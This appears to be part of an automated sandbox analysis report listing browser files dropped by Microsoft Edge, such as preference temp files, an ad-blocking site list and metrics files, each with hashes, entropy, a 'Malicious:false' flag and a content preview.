                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6a76f269-ad37-47e4-887b-93e82e00fc35.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44677
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096404854264658
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBKwuwhDO6vP6O2lIY8V241FerxAcGoup1Xl3jVzXq:z/Ps+wsI7yOEi6W/8dchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:5529E96074EE0A4C62B285D3F956829C
                                                                                                                                                                                                                                                                                                  SHA1:9C1E339EC0E085C044449888E02E684F687494EA
                                                                                                                                                                                                                                                                                                  SHA-256:0DF1B3ADB2B789FD02B16C0C4C1B5265B89A929FCF64562C9043A4EAFE2E67C7
                                                                                                                                                                                                                                                                                                  SHA-512:E2A2B68916C1AAE49AFFBA8D0FEB4D8B890E03135CF6F7E7C870D095C4A1142B5710F1C5CEDE9493EEF44EBAA72580F8C52F7964B4DC15FF3178FEFFEA007734
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6de73268-e1ca-4f15-a874-7bc8aa314cde.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):43746
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0952459646356445
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBdwuihDO6vP6OgdpElQM4vcGoup1Xl3jVzXr4CCA8:z/Ps+wsI7ynEh6AUechu3VlXr4CRo5
                                                                                                                                                                                                                                                                                                  MD5:32A00C0FF7229CED1B31D2693BADEA77
                                                                                                                                                                                                                                                                                                  SHA1:BAA825E259995C2BB45E925C0D0108F07D401937
                                                                                                                                                                                                                                                                                                  SHA-256:982491D3A02EB78AA4D1D4BFCC821BEED8D8D4300DC67909DCEF8A5D21C8D7AD
                                                                                                                                                                                                                                                                                                  SHA-512:DF10BFEB147403E287D6920B3463841749209B6BB4B9AE905A1A1CAA0AF06AD2EEF7843CF0CB958E8A7BD0596B901A72769F8A2890194B3C621C77869F844460
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\891bb864-e0af-446c-bbda-9ab223fc1501.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45874
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088539112280987
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5d9SWXkuNhDO6vP6O2lIY8V241FerxA9N2aPiCAopGoup1Xl3jV7:DMk1rT8H19SWM6W/8d98aPiRophu3Vlf
                                                                                                                                                                                                                                                                                                  MD5:C08DDA3A4BD9005BC0A61252E5867789
                                                                                                                                                                                                                                                                                                  SHA1:BCA14183CD41D7FB89D0524F59A88FE6A2408781
                                                                                                                                                                                                                                                                                                  SHA-256:4C6465C8EBB912899626DE96DA8C6479CE7A724EBFDC48200A78A2448B3C29F1
                                                                                                                                                                                                                                                                                                  SHA-512:35467FBCD5A9BC883DF77D40F036C72E8D77EFB4765065C73109189E85F8B70CA6121D925E0F45CF27BE9D3F0039AFDABA7741C47C00B3D21450E99B2809C959
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735279286"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\95c6ad7e-167e-4058-a1d5-1d114c0bfa06.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45827
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088787501721106
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5d9StkuNhDO6vP6O2lIY8V241FerxA9N2aPiCAopGoup1Xl3jVzf:DMk1rT8H19Sy6W/8d98aPiRophu3VlXP
                                                                                                                                                                                                                                                                                                  MD5:4878169B0A6217C4FA8BC4C64859A051
                                                                                                                                                                                                                                                                                                  SHA1:D7A22C6B397A0B0A0BA378394055512C5861D965
                                                                                                                                                                                                                                                                                                  SHA-256:1BEFA057835B2961B36B25085046907C450CAE01623873881C32FF0C14AF0506
                                                                                                                                                                                                                                                                                                  SHA-512:9A1B47753FF2FEF60C0C07A167DC2D839E92D1468939B664B042D4F402C4B0442E04822F37B0894777EA068917C7A6C9103BBB2EBA028E5D066E43396FC6251B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735279286"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                  MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                  SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                  SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                  SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\f4f05c7c-352d-4a96-beee-b30115a16e7f.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                  MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                  SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                  SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                  SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E42A5-4B0.pma

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03892847287316021
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:JD0o3tmP6rVZxJu4c4NgsXjiwE0foYhAwNFCAgTQbMm8En8y08Tcm2RGOdB:90stdHiqphZTCNmn08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:002B3CE07C7036D2264B40B9A64BC635
                                                                                                                                                                                                                                                                                                  SHA1:662FB5C9D8220B7CBE718455E21ADE0031A8F630
                                                                                                                                                                                                                                                                                                  SHA-256:301C3590280B4E1DC32028997CF8437378693BB29292686BA4E1E3C41F9E0146
                                                                                                                                                                                                                                                                                                  SHA-512:6F94D45571F80AF35A2009FC299E35B9517FC362CBF79FC8F64B621FFE4DD488B7A5191A9C48DB76380EB393959484E8A341D5155800DDA2788427776A77FA69
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................^..xN..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".lysxmd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E42B0-984.pma

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 134217728.000000, slope 75015551881388056232440365056.000000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4244024230801336
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:DZI1wOE6lMUS+iz+59SzVCK1BrE/STye5EG6Ysq/ntW/jeg1HFm:u1wEVaCSRCK1+/je5eYsqVW/jeaHM
                                                                                                                                                                                                                                                                                                  MD5:E8973C8F6CBA5DB1177990DECBFDF622
                                                                                                                                                                                                                                                                                                  SHA1:5F7129B12393151EF1DBE017D97E9C1EEA663220
                                                                                                                                                                                                                                                                                                  SHA-256:37306E9623F8CFD73BAD4193D4329AC0179F60D55AFACCFFA6EEA4C54D3CFAC0
                                                                                                                                                                                                                                                                                                  SHA-512:41371285C153B6FE28A90DE8478058F641C02CB9AC38DE3053C17C2FAA0249119EE2CE163BA8DDFCADC20EC0F5237F3BB3407510736542157EB6B333AD9A7298
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@............... >..x=..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".lysxmd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E42B0-B44.pma

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.045408880791223794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:JMNw40o3tm0nOAWV6Y6JZpjrZXpAgMA7fh+7NEJItdGRQ8RVMPDn8y08Tcm2RGOD:p40stjMSRNFhwVurMb08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:E5318F370A52C3D876BC7D9C646B0E3B
                                                                                                                                                                                                                                                                                                  SHA1:569E24040225E03455D2FFD960514A10E70B75AA
                                                                                                                                                                                                                                                                                                  SHA-256:5671E168E1A638FE156716B8D25BE28715A4A22BFF140187882709D76F8129F3
                                                                                                                                                                                                                                                                                                  SHA-512:B52F40AF0A9E6FBE9CA17586688B9D1A33A49E39D4B464C5F337B420108E094E0BF580A9F80634A986661F1D453B504A2765348A536162340EF6F757D9D6205D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............xf..0V..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".lysxmd20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U..G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2..........I..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                                                  MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                                                  SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                                                  SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                                                  SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
